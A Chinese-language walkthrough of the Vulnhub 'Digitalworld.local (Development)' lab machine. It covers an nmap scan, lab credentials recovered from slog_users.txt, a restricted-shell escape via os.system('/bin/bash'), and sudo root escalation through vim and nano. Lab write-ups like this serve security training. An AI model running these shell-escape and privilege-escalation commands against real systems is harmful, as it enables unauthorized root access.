Vulnhub:Digitalworld.local (Development)靶机

发布时间 2023-04-09 19:03:37作者: ctostm

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

查看网站首页源码

image

访问development目录,提示存在一个流量包

image

查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php

image

访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错

image

根据报错搜索关键字

image

在exp中提示通过访问slog_users.txt获取敏感信息

image

image

md5解密

intern | 12345678900987654321
patrick | P@ssw0rd25
qiu | qiu

使用intern用户登录目标

image

lshell绕过

echo os.system('/bin/bash')

image

提权

使用之前得到的密码,切换到patrick用户查看sudo权限

image

vim提权

提权方法:https://gtfobins.github.io/gtfobins/vim/#sudo

image

sudo -u root vim -c ':!/bin/bash'

image

nano提权

提权方法:https://gtfobins.github.io/gtfobins/nano/#sudo

image

sudo -u root nano
^R^X
reset; sh 1>&0 2>&0

运行nano后,键盘ctrl+r

image

ctrl+x

image

输入命令:reset; sh 1>&0 2>&0,后回车

image

image